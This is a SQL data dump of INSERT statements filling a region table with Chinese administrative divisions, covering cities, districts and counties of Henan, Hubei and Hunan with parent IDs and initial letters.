INSERT INTO `ey_region` VALUES ('21712', '市辖区', '3', '21711', 'S');
INSERT INTO `ey_region` VALUES ('21713', '老城区', '3', '21711', 'L');
INSERT INTO `ey_region` VALUES ('21722', '西工区', '3', '21711', 'X');
INSERT INTO `ey_region` VALUES ('21733', '廛河回族区', '3', '21711', 'C');
INSERT INTO `ey_region` VALUES ('21742', '涧西区', '3', '21711', 'J');
INSERT INTO `ey_region` VALUES ('21758', '吉利区', '3', '21711', 'J');
INSERT INTO `ey_region` VALUES ('21761', '洛龙区', '3', '21711', 'L');
INSERT INTO `ey_region` VALUES ('21770', '孟津县', '3', '21711', 'M');
INSERT INTO `ey_region` VALUES ('21781', '新安县', '3', '21711', 'X');
INSERT INTO `ey_region` VALUES ('21794', '栾川县', '3', '21711', 'L');
INSERT INTO `ey_region` VALUES ('21809', '嵩县', '3', '21711', 'S');
INSERT INTO `ey_region` VALUES ('21829', '汝阳县', '3', '21711', 'R');
INSERT INTO `ey_region` VALUES ('21844', '宜阳县', '3', '21711', 'Y');
INSERT INTO `ey_region` VALUES ('21862', '洛宁县', '3', '21711', 'L');
INSERT INTO `ey_region` VALUES ('21881', '伊川县', '3', '21711', 'Y');
INSERT INTO `ey_region` VALUES ('21896', '偃师市', '3', '21711', 'Y');
INSERT INTO `ey_region` VALUES ('21913', '平顶山市', '2', '21387', 'P');
INSERT INTO `ey_region` VALUES ('21914', '市辖区', '3', '21913', 'S');
INSERT INTO `ey_region` VALUES ('21915', '新华区', '3', '21913', 'X');
INSERT INTO `ey_region` VALUES ('21928', '卫东区', '3', '21913', 'W');
INSERT INTO `ey_region` VALUES ('21940', '石龙区', '3', '21913', 'S');
INSERT INTO `ey_region` VALUES ('21945', '湛河区', '3', '21913', 'Z');
INSERT INTO `ey_region` VALUES ('21954', '宝丰县', '3', '21913', 'B');
INSERT INTO `ey_region` VALUES ('21968', '叶 县', '3', '21913', 'Y');
INSERT INTO `ey_region` VALUES ('21987', '鲁山县', '3', '21913', 'L');
INSERT INTO `ey_region` VALUES ('22009', '郏 县', '3', '21913', 'J');
INSERT INTO `ey_region` VALUES ('22024', '舞钢市', '3', '21913', 'W');
INSERT INTO `ey_region` VALUES ('22037', '汝州市', '3', '21913', 'R');
INSERT INTO `ey_region` VALUES ('22058', '安阳市', '2', '21387', 'A');
INSERT INTO `ey_region` VALUES ('22059', '市辖区', '3', '22058', 'S');
INSERT INTO `ey_region` VALUES ('22060', '文峰区', '3', '22058', 'W');
INSERT INTO `ey_region` VALUES ('22080', '北关区', '3', '22058', 'B');
INSERT INTO `ey_region` VALUES ('22090', '殷都区', '3', '22058', 'Y');
INSERT INTO `ey_region` VALUES ('22101', '龙安区', '3', '22058', 'L');
INSERT INTO `ey_region` VALUES ('22111', '安阳县', '3', '22058', 'A');
INSERT INTO `ey_region` VALUES ('22133', '汤阴县', '3', '22058', 'T');
INSERT INTO `ey_region` VALUES ('22144', '滑县', '3', '22058', 'H');
INSERT INTO `ey_region` VALUES ('22167', '内黄县', '3', '22058', 'N');
INSERT INTO `ey_region` VALUES ('22185', '林州市', '3', '22058', 'L');
INSERT INTO `ey_region` VALUES ('22206', '鹤壁市', '2', '21387', 'H');
INSERT INTO `ey_region` VALUES ('22207', '市辖区', '3', '22206', 'S');
INSERT INTO `ey_region` VALUES ('22208', '鹤山区', '3', '22206', 'H');
INSERT INTO `ey_region` VALUES ('22216', '山城区', '3', '22206', 'S');
INSERT INTO `ey_region` VALUES ('22224', '淇滨区', '3', '22206', 'Q');
INSERT INTO `ey_region` VALUES ('22232', '浚县', '3', '22206', 'J');
INSERT INTO `ey_region` VALUES ('22243', '淇县', '3', '22206', 'Q');
INSERT INTO `ey_region` VALUES ('22251', '新乡市', '2', '21387', 'X');
INSERT INTO `ey_region` VALUES ('22252', '市辖区', '3', '22251', 'S');
INSERT INTO `ey_region` VALUES ('22253', '红旗区', '3', '22251', 'H');
INSERT INTO `ey_region` VALUES ('22264', '卫滨区', '3', '22251', 'W');
INSERT INTO `ey_region` VALUES ('22273', '凤泉区', '3', '22251', 'F');
INSERT INTO `ey_region` VALUES ('22279', '牧野区', '3', '22251', 'M');
INSERT INTO `ey_region` VALUES ('22290', '新乡县', '3', '22251', 'X');
INSERT INTO `ey_region` VALUES ('22299', '获嘉县', '3', '22251', 'H');
INSERT INTO `ey_region` VALUES ('22312', '原阳县', '3', '22251', 'Y');
INSERT INTO `ey_region` VALUES ('22330', '延津县', '3', '22251', 'Y');
INSERT INTO `ey_region` VALUES ('22347', '封丘县', '3', '22251', 'F');
INSERT INTO `ey_region` VALUES ('22367', '长垣县', '3', '22251', 'C');
INSERT INTO `ey_region` VALUES ('22386', '卫辉市', '3', '22251', 'W');
INSERT INTO `ey_region` VALUES ('22400', '辉县市', '3', '22251', 'H');
INSERT INTO `ey_region` VALUES ('22423', '焦作市', '2', '21387', 'J');
INSERT INTO `ey_region` VALUES ('22424', '市辖区', '3', '22423', 'S');
INSERT INTO `ey_region` VALUES ('22425', '解放区', '3', '22423', 'J');
INSERT INTO `ey_region` VALUES ('22435', '中站区', '3', '22423', 'Z');
INSERT INTO `ey_region` VALUES ('22446', '马村区', '3', '22423', 'M');
INSERT INTO `ey_region` VALUES ('22454', '山阳区', '3', '22423', 'S');
INSERT INTO `ey_region` VALUES ('22465', '修武县', '3', '22423', 'X');
INSERT INTO `ey_region` VALUES ('22475', '博爱县', '3', '22423', 'B');
INSERT INTO `ey_region` VALUES ('22487', '武陟县', '3', '22423', 'W');
INSERT INTO `ey_region` VALUES ('22503', '温县', '3', '22423', 'W');
INSERT INTO `ey_region` VALUES ('22515', '济源市', '3', '22423', 'J');
INSERT INTO `ey_region` VALUES ('22532', '沁阳市', '3', '22423', 'Q');
INSERT INTO `ey_region` VALUES ('22546', '孟州市', '3', '22423', 'M');
INSERT INTO `ey_region` VALUES ('22558', '濮阳市', '2', '21387', 'P');
INSERT INTO `ey_region` VALUES ('22559', '市辖区', '3', '22558', 'S');
INSERT INTO `ey_region` VALUES ('22560', '华龙区', '3', '22558', 'H');
INSERT INTO `ey_region` VALUES ('22578', '清丰县', '3', '22558', 'Q');
INSERT INTO `ey_region` VALUES ('22596', '南乐县', '3', '22558', 'N');
INSERT INTO `ey_region` VALUES ('22609', '范县', '3', '22558', 'F');
INSERT INTO `ey_region` VALUES ('22622', '台前县', '3', '22558', 'T');
INSERT INTO `ey_region` VALUES ('22632', '濮阳县', '3', '22558', 'P');
INSERT INTO `ey_region` VALUES ('22655', '许昌市', '2', '21387', 'X');
INSERT INTO `ey_region` VALUES ('22656', '市辖区', '3', '22655', 'S');
INSERT INTO `ey_region` VALUES ('22657', '魏都区', '3', '22655', 'W');
INSERT INTO `ey_region` VALUES ('22671', '许昌县', '3', '22655', 'X');
INSERT INTO `ey_region` VALUES ('22688', '鄢陵县', '3', '22655', 'Y');
INSERT INTO `ey_region` VALUES ('22701', '襄城县', '3', '22655', 'X');
INSERT INTO `ey_region` VALUES ('22718', '禹州市', '3', '22655', 'Y');
INSERT INTO `ey_region` VALUES ('22745', '长葛市', '3', '22655', 'C');
INSERT INTO `ey_region` VALUES ('22762', '漯河市', '2', '21387', 'L');
INSERT INTO `ey_region` VALUES ('22763', '市辖区', '3', '22762', 'S');
INSERT INTO `ey_region` VALUES ('22764', '源汇区', '3', '22762', 'Y');
INSERT INTO `ey_region` VALUES ('22773', '郾城区', '3', '22762', 'Y');
INSERT INTO `ey_region` VALUES ('22783', '召陵区', '3', '22762', 'Z');
INSERT INTO `ey_region` VALUES ('22793', '舞阳县', '3', '22762', 'W');
INSERT INTO `ey_region` VALUES ('22808', '临颖县', '3', '22762', 'L');
INSERT INTO `ey_region` VALUES ('22824', '三门峡市', '2', '21387', 'S');
INSERT INTO `ey_region` VALUES ('22825', '市辖区', '3', '22824', 'S');
INSERT INTO `ey_region` VALUES ('22826', '湖滨区', '3', '22824', 'H');
INSERT INTO `ey_region` VALUES ('22838', '渑池县', '3', '22824', 'M');
INSERT INTO `ey_region` VALUES ('22851', '陕县', '3', '22824', 'S');
INSERT INTO `ey_region` VALUES ('22865', '卢氏县', '3', '22824', 'L');
INSERT INTO `ey_region` VALUES ('22885', '义马市', '3', '22824', 'Y');
INSERT INTO `ey_region` VALUES ('22893', '灵宝市', '3', '22824', 'L');
INSERT INTO `ey_region` VALUES ('22910', '南阳市', '2', '21387', 'N');
INSERT INTO `ey_region` VALUES ('22911', '市辖区', '3', '22910', 'S');
INSERT INTO `ey_region` VALUES ('22912', '宛城区', '3', '22910', 'W');
INSERT INTO `ey_region` VALUES ('22930', '卧龙区', '3', '22910', 'W');
INSERT INTO `ey_region` VALUES ('22951', '南召县', '3', '22910', 'N');
INSERT INTO `ey_region` VALUES ('22973', '方城县', '3', '22910', 'F');
INSERT INTO `ey_region` VALUES ('22992', '西峡县', '3', '22910', 'X');
INSERT INTO `ey_region` VALUES ('23013', '镇平县', '3', '22910', 'Z');
INSERT INTO `ey_region` VALUES ('23036', '内乡县', '3', '22910', 'N');
INSERT INTO `ey_region` VALUES ('23053', '淅川县', '3', '22910', 'X');
INSERT INTO `ey_region` VALUES ('23071', '社旗县', '3', '22910', 'S');
INSERT INTO `ey_region` VALUES ('23087', '唐河县', '3', '22910', 'T');
INSERT INTO `ey_region` VALUES ('23108', '新野县', '3', '22910', 'X');
INSERT INTO `ey_region` VALUES ('23123', '桐柏县', '3', '22910', 'T');
INSERT INTO `ey_region` VALUES ('23140', '邓州市', '3', '22910', 'D');
INSERT INTO `ey_region` VALUES ('23170', '商丘市', '2', '21387', 'S');
INSERT INTO `ey_region` VALUES ('23171', '市辖区', '3', '23170', 'S');
INSERT INTO `ey_region` VALUES ('23172', '梁园区', '3', '23170', 'L');
INSERT INTO `ey_region` VALUES ('23192', '睢阳区', '3', '23170', 'S');
INSERT INTO `ey_region` VALUES ('23211', '民权县', '3', '23170', 'M');
INSERT INTO `ey_region` VALUES ('23232', '睢县', '3', '23170', 'S');
INSERT INTO `ey_region` VALUES ('23253', '宁陵县', '3', '23170', 'N');
INSERT INTO `ey_region` VALUES ('23268', '柘城县', '3', '23170', 'Z');
INSERT INTO `ey_region` VALUES ('23290', '虞城县', '3', '23170', 'Y');
INSERT INTO `ey_region` VALUES ('23317', '夏邑县', '3', '23170', 'X');
INSERT INTO `ey_region` VALUES ('23342', '永城市', '3', '23170', 'Y');
INSERT INTO `ey_region` VALUES ('23372', '信阳市', '2', '21387', 'X');
INSERT INTO `ey_region` VALUES ('23373', '市辖区', '3', '23372', 'S');
INSERT INTO `ey_region` VALUES ('23374', '浉河区', '3', '23372', 'S');
INSERT INTO `ey_region` VALUES ('23393', '平桥区', '3', '23372', 'P');
INSERT INTO `ey_region` VALUES ('23414', '罗山县', '3', '23372', 'L');
INSERT INTO `ey_region` VALUES ('23435', '光山县', '3', '23372', 'G');
INSERT INTO `ey_region` VALUES ('23455', '新县', '3', '23372', 'X');
INSERT INTO `ey_region` VALUES ('23471', '商城县', '3', '23372', 'S');
INSERT INTO `ey_region` VALUES ('23492', '固始县', '3', '23372', 'G');
INSERT INTO `ey_region` VALUES ('23525', '潢川县', '3', '23372', 'H');
INSERT INTO `ey_region` VALUES ('23549', '淮滨县', '3', '23372', 'H');
INSERT INTO `ey_region` VALUES ('23567', '息县', '3', '23372', 'X');
INSERT INTO `ey_region` VALUES ('23589', '周口市', '2', '21387', 'Z');
INSERT INTO `ey_region` VALUES ('23590', '市辖区', '3', '23589', 'S');
INSERT INTO `ey_region` VALUES ('23591', '川汇区', '3', '23589', 'C');
INSERT INTO `ey_region` VALUES ('23604', '扶沟县', '3', '23589', 'F');
INSERT INTO `ey_region` VALUES ('23621', '西华县', '3', '23589', 'X');
INSERT INTO `ey_region` VALUES ('23647', '商水县', '3', '23589', 'S');
INSERT INTO `ey_region` VALUES ('23672', '沈丘县', '3', '23589', 'S');
INSERT INTO `ey_region` VALUES ('23695', '郸城县', '3', '23589', 'D');
INSERT INTO `ey_region` VALUES ('23716', '淮阳县', '3', '23589', 'H');
INSERT INTO `ey_region` VALUES ('23736', '太康县', '3', '23589', 'T');
INSERT INTO `ey_region` VALUES ('23766', '鹿邑县', '3', '23589', 'L');
INSERT INTO `ey_region` VALUES ('23796', '项城市', '3', '23589', 'X');
INSERT INTO `ey_region` VALUES ('23818', '驻马店市', '2', '21387', 'Z');
INSERT INTO `ey_region` VALUES ('23819', '市辖区', '3', '23818', 'S');
INSERT INTO `ey_region` VALUES ('23820', '驿城区', '3', '23818', 'Y');
INSERT INTO `ey_region` VALUES ('23840', '西平县', '3', '23818', 'X');
INSERT INTO `ey_region` VALUES ('23861', '上蔡县', '3', '23818', 'S');
INSERT INTO `ey_region` VALUES ('23886', '平舆县', '3', '23818', 'P');
INSERT INTO `ey_region` VALUES ('23905', '正阳县', '3', '23818', 'Z');
INSERT INTO `ey_region` VALUES ('23926', '确山县', '3', '23818', 'Q');
INSERT INTO `ey_region` VALUES ('23940', '泌阳县', '3', '23818', 'M');
INSERT INTO `ey_region` VALUES ('23965', '汝南县', '3', '23818', 'R');
INSERT INTO `ey_region` VALUES ('23983', '遂平县', '3', '23818', 'S');
INSERT INTO `ey_region` VALUES ('23999', '新蔡县', '3', '23818', 'X');
INSERT INTO `ey_region` VALUES ('24022', '湖北省', '1', '0', 'H');
INSERT INTO `ey_region` VALUES ('24023', '武汉市', '2', '24022', 'W');
INSERT INTO `ey_region` VALUES ('24024', '市辖区', '3', '24023', 'S');
INSERT INTO `ey_region` VALUES ('24025', '江岸区', '3', '24023', 'J');
INSERT INTO `ey_region` VALUES ('24043', '江汉区', '3', '24023', 'J');
INSERT INTO `ey_region` VALUES ('24057', '硚口区', '3', '24023', 'Q');
INSERT INTO `ey_region` VALUES ('24069', '汉阳区', '3', '24023', 'H');
INSERT INTO `ey_region` VALUES ('24082', '武昌区', '3', '24023', 'W');
INSERT INTO `ey_region` VALUES ('24098', '青山区', '3', '24023', 'Q');
INSERT INTO `ey_region` VALUES ('24111', '洪山区', '3', '24023', 'H');
INSERT INTO `ey_region` VALUES ('24129', '东西湖区', '3', '24023', 'D');
INSERT INTO `ey_region` VALUES ('24142', '汉南区', '3', '24023', 'H');
INSERT INTO `ey_region` VALUES ('24150', '蔡甸区', '3', '24023', 'C');
INSERT INTO `ey_region` VALUES ('24165', '江夏区', '3', '24023', 'J');
INSERT INTO `ey_region` VALUES ('24185', '黄陂区', '3', '24023', 'H');
INSERT INTO `ey_region` VALUES ('24205', '武汉市新洲区', '3', '24023', 'W');
INSERT INTO `ey_region` VALUES ('24224', '黄石市', '2', '24022', 'H');
INSERT INTO `ey_region` VALUES ('24225', '市辖区', '3', '24224', 'S');
INSERT INTO `ey_region` VALUES ('24226', '黄石港区', '3', '24224', 'H');
INSERT INTO `ey_region` VALUES ('24233', '西塞山区', '3', '24224', 'X');
INSERT INTO `ey_region` VALUES ('24242', '下陆区', '3', '24224', 'X');
INSERT INTO `ey_region` VALUES ('24247', '铁山区', '3', '24224', 'T');
INSERT INTO `ey_region` VALUES ('24250', '阳新县', '3', '24224', 'Y');
INSERT INTO `ey_region` VALUES ('24273', '大冶市', '3', '24224', 'D');
INSERT INTO `ey_region` VALUES ('24291', '十堰市', '2', '24022', 'S');
INSERT INTO `ey_region` VALUES ('24292', '市辖区', '3', '24291', 'S');
INSERT INTO `ey_region` VALUES ('24293', '茅箭区', '3', '24291', 'M');
INSERT INTO `ey_region` VALUES ('24302', '张湾区', '3', '24291', 'Z');
INSERT INTO `ey_region` VALUES ('24314', '郧县', '3', '24291', 'Y');
INSERT INTO `ey_region` VALUES ('24335', '郧西县', '3', '24291', 'Y');
INSERT INTO `ey_region` VALUES ('24354', '竹山县', '3', '24291', 'Z');
INSERT INTO `ey_region` VALUES ('24374', '竹溪县', '3', '24291', 'Z');
INSERT INTO `ey_region` VALUES ('24405', '房县', '3', '24291', 'F');
INSERT INTO `ey_region` VALUES ('24435', '丹江口市', '3', '24291', 'D');
INSERT INTO `ey_region` VALUES ('24453', '宜昌市', '2', '24022', 'Y');
INSERT INTO `ey_region` VALUES ('24454', '市辖区', '3', '24453', 'S');
INSERT INTO `ey_region` VALUES ('24455', '西陵区', '3', '24453', 'X');
INSERT INTO `ey_region` VALUES ('24465', '伍家岗区', '3', '24453', 'W');
INSERT INTO `ey_region` VALUES ('24471', '点军区', '3', '24453', 'D');
INSERT INTO `ey_region` VALUES ('24477', '猇亭区', '3', '24453', 'X');
INSERT INTO `ey_region` VALUES ('24481', '夷陵区', '3', '24453', 'Y');
INSERT INTO `ey_region` VALUES ('24495', '远安县', '3', '24453', 'Y');
INSERT INTO `ey_region` VALUES ('24503', '兴山县', '3', '24453', 'X');
INSERT INTO `ey_region` VALUES ('24512', '秭归县', '3', '24453', 'Z');
INSERT INTO `ey_region` VALUES ('24525', '长阳县', '3', '24453', 'C');
INSERT INTO `ey_region` VALUES ('24537', '五峰县', '3', '24453', 'W');
INSERT INTO `ey_region` VALUES ('24546', '宜都市', '3', '24453', 'Y');
INSERT INTO `ey_region` VALUES ('24559', '当阳市', '3', '24453', 'D');
INSERT INTO `ey_region` VALUES ('24570', '枝江市', '3', '24453', 'Z');
INSERT INTO `ey_region` VALUES ('24580', '襄樊市', '2', '24022', 'X');
INSERT INTO `ey_region` VALUES ('24581', '市辖区', '3', '24580', 'S');
INSERT INTO `ey_region` VALUES ('24582', '襄城区', '3', '24580', 'X');
INSERT INTO `ey_region` VALUES ('24591', '樊城区', '3', '24580', 'F');
INSERT INTO `ey_region` VALUES ('24608', '襄阳区', '3', '24580', 'X');
INSERT INTO `ey_region` VALUES ('24623', '南漳县', '3', '24580', 'N');
INSERT INTO `ey_region` VALUES ('24635', '谷城县', '3', '24580', 'G');
INSERT INTO `ey_region` VALUES ('24647', '保康县', '3', '24580', 'B');
INSERT INTO `ey_region` VALUES ('24659', '老河口市', '3', '24580', 'L');
INSERT INTO `ey_region` VALUES ('24674', '枣阳市', '3', '24580', 'Z');
INSERT INTO `ey_region` VALUES ('24692', '宜城市', '3', '24580', 'Y');
INSERT INTO `ey_region` VALUES ('24706', '鄂州市', '2', '24022', 'E');
INSERT INTO `ey_region` VALUES ('24707', '市辖区', '3', '24706', 'S');
INSERT INTO `ey_region` VALUES ('24708', '粱子湖区', '3', '24706', 'L');
INSERT INTO `ey_region` VALUES ('24714', '华容区', '3', '24706', 'H');
INSERT INTO `ey_region` VALUES ('24722', '鄂城区', '3', '24706', 'E');
INSERT INTO `ey_region` VALUES ('24737', '荆门市', '2', '24022', 'J');
INSERT INTO `ey_region` VALUES ('24738', '市辖区', '3', '24737', 'S');
INSERT INTO `ey_region` VALUES ('24739', '东宝区', '3', '24737', 'D');
INSERT INTO `ey_region` VALUES ('24749', '掇刀区', '3', '24737', 'D');
INSERT INTO `ey_region` VALUES ('24755', '京山县', '3', '24737', 'J');
INSERT INTO `ey_region` VALUES ('24778', '沙洋县', '3', '24737', 'S');
INSERT INTO `ey_region` VALUES ('24794', '钟祥市', '3', '24737', 'Z');
INSERT INTO `ey_region` VALUES ('24816', '孝感市', '2', '24022', 'X');
INSERT INTO `ey_region` VALUES ('24817', '市辖区', '3', '24816', 'S');
INSERT INTO `ey_region` VALUES ('24818', '孝南区', '3', '24816', 'X');
INSERT INTO `ey_region` VALUES ('24838', '孝昌县', '3', '24816', 'X');
INSERT INTO `ey_region` VALUES ('24853', '大悟县', '3', '24816', 'D');
INSERT INTO `ey_region` VALUES ('24871', '云梦县', '3', '24816', 'Y');
INSERT INTO `ey_region` VALUES ('24885', '应城市', '3', '24816', 'Y');
INSERT INTO `ey_region` VALUES ('24903', '安陆市', '3', '24816', 'A');
INSERT INTO `ey_region` VALUES ('24920', '汉川市', '3', '24816', 'H');
INSERT INTO `ey_region` VALUES ('24949', '荆州市', '2', '24022', 'J');
INSERT INTO `ey_region` VALUES ('24950', '市辖区', '3', '24949', 'S');
INSERT INTO `ey_region` VALUES ('24951', '沙市区', '3', '24949', 'S');
INSERT INTO `ey_region` VALUES ('24965', '荆州区', '3', '24949', 'J');
INSERT INTO `ey_region` VALUES ('24978', '公安县', '3', '24949', 'G');
INSERT INTO `ey_region` VALUES ('24995', '监利县', '3', '24949', 'J');
INSERT INTO `ey_region` VALUES ('25019', '江陵县', '3', '24949', 'J');
INSERT INTO `ey_region` VALUES ('25032', '石首市', '3', '24949', 'S');
INSERT INTO `ey_region` VALUES ('25048', '洪湖市', '3', '24949', 'H');
INSERT INTO `ey_region` VALUES ('25069', '松滋市', '3', '24949', 'S');
INSERT INTO `ey_region` VALUES ('25086', '黄冈市', '2', '24022', 'H');
INSERT INTO `ey_region` VALUES ('25087', '市辖区', '3', '25086', 'S');
INSERT INTO `ey_region` VALUES ('25088', '黄州区', '3', '25086', 'H');
INSERT INTO `ey_region` VALUES ('25099', '团风县', '3', '25086', 'T');
INSERT INTO `ey_region` VALUES ('25112', '红安县', '3', '25086', 'H');
INSERT INTO `ey_region` VALUES ('25126', '罗田县', '3', '25086', 'L');
INSERT INTO `ey_region` VALUES ('25143', '英山县', '3', '25086', 'Y');
INSERT INTO `ey_region` VALUES ('25158', '浠水县', '3', '25086', 'X');
INSERT INTO `ey_region` VALUES ('25175', '蕲春县', '3', '25086', 'Q');
INSERT INTO `ey_region` VALUES ('25192', '黄梅县', '3', '25086', 'H');
INSERT INTO `ey_region` VALUES ('25211', '麻城市', '3', '25086', 'M');
INSERT INTO `ey_region` VALUES ('25235', '武穴市', '3', '25086', 'W');
INSERT INTO `ey_region` VALUES ('25249', '咸宁市', '2', '24022', 'X');
INSERT INTO `ey_region` VALUES ('25250', '市辖区', '3', '25249', 'S');
INSERT INTO `ey_region` VALUES ('25251', '咸安区', '3', '25249', 'X');
INSERT INTO `ey_region` VALUES ('25266', '嘉鱼县', '3', '25249', 'J');
INSERT INTO `ey_region` VALUES ('25276', '通城县', '3', '25249', 'T');
INSERT INTO `ey_region` VALUES ('25290', '崇阳县', '3', '25249', 'C');
INSERT INTO `ey_region` VALUES ('25303', '通山县', '3', '25249', 'T');
INSERT INTO `ey_region` VALUES ('25317', '赤壁市', '3', '25249', 'C');
INSERT INTO `ey_region` VALUES ('25335', '随州市', '2', '24022', 'S');
INSERT INTO `ey_region` VALUES ('25336', '市辖区', '3', '25335', 'S');
INSERT INTO `ey_region` VALUES ('25337', '曾都区', '3', '25335', 'Z');
INSERT INTO `ey_region` VALUES ('25367', '广水市', '3', '25335', 'G');
INSERT INTO `ey_region` VALUES ('25388', '恩施州', '2', '24022', 'E');
INSERT INTO `ey_region` VALUES ('25389', '恩施市', '3', '25388', 'E');
INSERT INTO `ey_region` VALUES ('25406', '利川市', '3', '25388', 'L');
INSERT INTO `ey_region` VALUES ('25422', '建始县', '3', '25388', 'J');
INSERT INTO `ey_region` VALUES ('25433', '巴东县', '3', '25388', 'B');
INSERT INTO `ey_region` VALUES ('25446', '宣恩县', '3', '25388', 'X');
INSERT INTO `ey_region` VALUES ('25456', '咸丰县', '3', '25388', 'X');
INSERT INTO `ey_region` VALUES ('25467', '来凤县', '3', '25388', 'L');
INSERT INTO `ey_region` VALUES ('25476', '鹤峰县', '3', '25388', 'H');
INSERT INTO `ey_region` VALUES ('25487', '省直辖行政单位', '2', '24022', 'S');
INSERT INTO `ey_region` VALUES ('25488', '仙桃市', '3', '25487', 'X');
INSERT INTO `ey_region` VALUES ('25516', '潜江市', '3', '25487', 'Q');
INSERT INTO `ey_region` VALUES ('25541', '天门市', '3', '25487', 'T');
INSERT INTO `ey_region` VALUES ('25570', '神农架林区', '3', '25487', 'S');
INSERT INTO `ey_region` VALUES ('25579', '湖南省', '1', '0', 'H');
INSERT INTO `ey_region` VALUES ('25580', '长沙市', '2', '25579', 'C');
INSERT INTO `ey_region` VALUES ('25581', '市辖区', '3', '25580', 'S');
INSERT INTO `ey_region` VALUES ('25582', '芙蓉区', '3', '25580', 'F');
INSERT INTO `ey_region` VALUES ('25596', '天心区', '3', '25580', 'T');
INSERT INTO `ey_region` VALUES ('25607', '岳麓区', '3', '25580', 'Y');
INSERT INTO `ey_region` VALUES ('25620', '开福区', '3', '25580', 'K');
INSERT INTO `ey_region` VALUES ('25634', '雨花区', '3', '25580', 'Y');
INSERT INTO `ey_region` VALUES ('25645', '长沙县', '3', '25580', 'C');
INSERT INTO `ey_region` VALUES ('25666', '望城县', '3', '25580', 'W');
INSERT INTO `ey_region` VALUES ('25686', '宁乡县', '3', '25580', 'N');
INSERT INTO `ey_region` VALUES ('25720', '浏阳市', '3', '25580', 'L');
INSERT INTO `ey_region` VALUES ('25758', '株洲市', '2', '25579', 'Z');
INSERT INTO `ey_region` VALUES ('25759', '市辖区', '3', '25758', 'S');
INSERT INTO `ey_region` VALUES ('25760', '荷塘区', '3', '25758', 'H');
INSERT INTO `ey_region` VALUES ('25768', '芦淞区', '3', '25758', 'L');
INSERT INTO `ey_region` VALUES ('25777', '石峰区', '3', '25758', 'S');
INSERT INTO `ey_region` VALUES ('25785', '天元区', '3', '25758', 'T');
INSERT INTO `ey_region` VALUES ('25791', '株洲县', '3', '25758', 'Z');
INSERT INTO `ey_region` VALUES ('25810', '攸县', '3', '25758', 'Y');
INSERT INTO `ey_region` VALUES ('25836', '茶陵县', '3', '25758', 'C');
INSERT INTO `ey_region` VALUES ('25863', '炎陵县', '3', '25758', 'Y');
INSERT INTO `ey_region` VALUES ('25881', '醴陵市', '3', '25758', 'L');
INSERT INTO `ey_region` VALUES ('25912', '湘潭市', '2', '25579', 'X');
INSERT INTO `ey_region` VALUES ('25913', '市辖区', '3', '25912', 'S');
INSERT INTO `ey_region` VALUES ('25914', '雨湖区', '3', '25912', 'Y');
INSERT INTO `ey_region` VALUES ('25929', '岳塘区', '3', '25912', 'Y');
INSERT INTO `ey_region` VALUES ('25947', '湘潭县', '3', '25912', 'X');
INSERT INTO `ey_region` VALUES ('25970', '湘乡市', '3', '25912', 'X');
INSERT INTO `ey_region` VALUES ('25993', '韶山市', '3', '25912', 'S');
INSERT INTO `ey_region` VALUES ('26001', '衡阳市', '2', '25579', 'H');
INSERT INTO `ey_region` VALUES ('26002', '市辖区', '3', '26001', 'S');
INSERT INTO `ey_region` VALUES ('26003', '珠晖区', '3', '26001', 'Z');
INSERT INTO `ey_region` VALUES ('26019', '雁峰区', '3', '26001', 'Y');
INSERT INTO `ey_region` VALUES ('26028', '石鼓区', '3', '26001', 'S');
INSERT INTO `ey_region` VALUES ('26037', '蒸湘区', '3', '26001', 'Z');
INSERT INTO `ey_region` VALUES ('26045', '南岳区', '3', '26001', 'N');
INSERT INTO `ey_region` VALUES ('26051', '衡阳县', '3', '26001', 'H');
INSERT INTO `ey_region` VALUES ('26080', '衡南县', '3', '26001', 'H');
INSERT INTO `ey_region` VALUES ('26112', '衡山县', '3', '26001', 'H');
INSERT INTO `ey_region` VALUES ('26130', '衡东县', '3', '26001', 'H');
INSERT INTO `ey_region` VALUES ('26155', '祁东县', '3', '26001', 'Q');
INSERT INTO `ey_region` VALUES ('26179', '耒阳市', '3', '26001', 'L');
INSERT INTO `ey_region` VALUES ('26215', '常宁市', '3', '26001', 'C');
INSERT INTO `ey_region` VALUES ('26242', '邵阳市', '2', '25579', 'S');
INSERT INTO `ey_region` VALUES ('26243', '市辖区', '3', '26242', 'S');
INSERT INTO `ey_region` VALUES ('26244', '双清区', '3', '26242', 'S');
INSERT INTO `ey_region` VALUES ('26257', '大祥区', '3', '26242', 'D');
INSERT INTO `ey_region` VALUES ('26272', '北塔区', '3', '26242', 'B');
INSERT INTO `ey_region` VALUES ('26279', '邵东县', '3', '26242', 'S');
INSERT INTO `ey_region` VALUES ('26306', '新邵县', '3', '26242', 'X');
INSERT INTO `ey_region` VALUES ('26322', '邵阳县', '3', '26242', 'S');
INSERT INTO `ey_region` VALUES ('26348', '隆回县', '3', '26242', 'L');
INSERT INTO `ey_region` VALUES ('26375', '洞口县', '3', '26242', 'D');
INSERT INTO `ey_region` VALUES ('26399', '绥宁县', '3', '26242', 'S');
INSERT INTO `ey_region` VALUES ('26425', '新宁县', '3', '26242', 'X');
INSERT INTO `ey_region` VALUES ('26444', '城步县', '3', '26242', 'C');
INSERT INTO `ey_region` VALUES ('26465', '武冈市', '3', '26242', 'W');
INSERT INTO `ey_region` VALUES ('26485', '岳阳市', '2', '25579', 'Y');
INSERT INTO `ey_region` VALUES ('26486', '市辖区', '3', '26485', 'S');
INSERT INTO `ey_region` VALUES ('26487', '岳阳楼区', '3', '26485', 'Y');
INSERT INTO `ey_region` VALUES ('26511', '云溪区', '3', '26485', 'Y');
INSERT INTO `ey_region` VALUES ('26521', '君山区', '3', '26485', 'J');
INSERT INTO `ey_region` VALUES ('26529', '岳阳县', '3', '26485', 'Y');
INSERT INTO `ey_region` VALUES ('26551', '华容县', '3', '26485', 'H');
INSERT INTO `ey_region` VALUES ('26572', '湘阴县', '3', '26485', 'X');
INSERT INTO `ey_region` VALUES ('26592', '平江县', '3', '26485', 'P');
INSERT INTO `ey_region` VALUES ('26620', '汩罗市', '3', '26485', 'G');
INSERT INTO `ey_region` VALUES ('26657', '临湘市', '3', '26485', 'L');
INSERT INTO `ey_region` VALUES ('26683', '常德市', '2', '25579', 'C');
INSERT INTO `ey_region` VALUES ('26684', '市辖区', '3', '26683', 'S');
INSERT INTO `ey_region` VALUES ('26685', '武陵区', '3', '26683', 'W');
INSERT INTO `ey_region` VALUES ('26702', '鼎城区', '3', '26683', 'D');
INSERT INTO `ey_region` VALUES ('26741', '安乡县', '3', '26683', 'A');
INSERT INTO `ey_region` VALUES ('26762', '汉寿县', '3', '26683', 'H');
INSERT INTO `ey_region` VALUES ('26793', '澧县', '3', '26683', 'L');
INSERT INTO `ey_region` VALUES ('26826', '临澧县', '3', '26683', 'L');
